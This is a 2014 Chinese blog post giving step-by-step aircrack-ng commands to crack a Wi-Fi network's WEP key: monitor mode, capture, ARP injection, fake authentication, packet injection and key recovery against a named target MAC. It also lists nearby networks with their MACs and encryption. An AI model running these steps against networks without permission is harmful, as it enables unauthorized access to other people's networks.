注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

c32's blog

每天学习一点点,每天进步一点点.

 
 
 
 
 

日志

 
 

aireplay-ng实战  

2014-04-18 16:13:42|  分类: ubuntu |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |
ubuntu 安装和使用aircrack-ng 教程
http://cx7863.blog.163.com/blog/static/22865002620143150125820/

目标MAC  00:87:36:10:FB:6F
本地MAC c0:f8:da:21:48:3b

1、启动无线网卡的监控模式,在终端中输入:
sudo airmon-ng start wlan0

2、查看无线AP在终端中输入:
sudo airodump-ng mon0
(mon0 是启动监控模式后无线网的端口)

3、抓包
打开另一个终端,输入:
sudo airodump-ng -c 6 --bssid 00:87:36:10:FB:6F -w c32 mon0

4、对目标AP使用ArpRequest注入攻击
aireplay-ng -3 -b 00:87:36:10:FB:6F -h c0:f8:da:21:48:3b mon0 

4、与AP建立虚拟连接
再打开一个新终端,输入:

sudo aireplay-ng -1 0 -a 00:87:36:10:FB:6F -h c0:f8:da:21:48:3b mon0
(-h后面跟着的My MAC是自己的无线网卡的MAC地址,即ifconfig命令下wlan0对应的mac地址)

5、进行注入
成功建立虚拟连接后输入:

sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:87:36:10:FB:6F -h c0:f8:da:21:48:3b mon0
现在回头看下步骤3的终端是不是DATA在开始飞涨!(那串ff照抄就行)

5、解密码    一万个DATA后-直接执行本步骤
sudo aircrack-ng c32*.cap

6、收工    (一定要手动关
sudo airmon-ng stop mon0 关闭监控模式

WIFIMAC 信道 加密 信号强度
360WIFI-A71C 00:87:36:0F:A7:1C 1 WPA2 -64
APC-201306181001 02:E0:FA:B9:C5:DE 1 WEP -1
yam 8C:BE:BE:05:5B:86 1 WPA2-76
E_car_4F D8:15:0D:6B:B3:6E 1 OPEN-77
     
     
     
     
     
     
     
     
     
     
     
     
     
     
     
   
  评论这张
 
阅读(45)| 评论(0)
推荐 转载

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017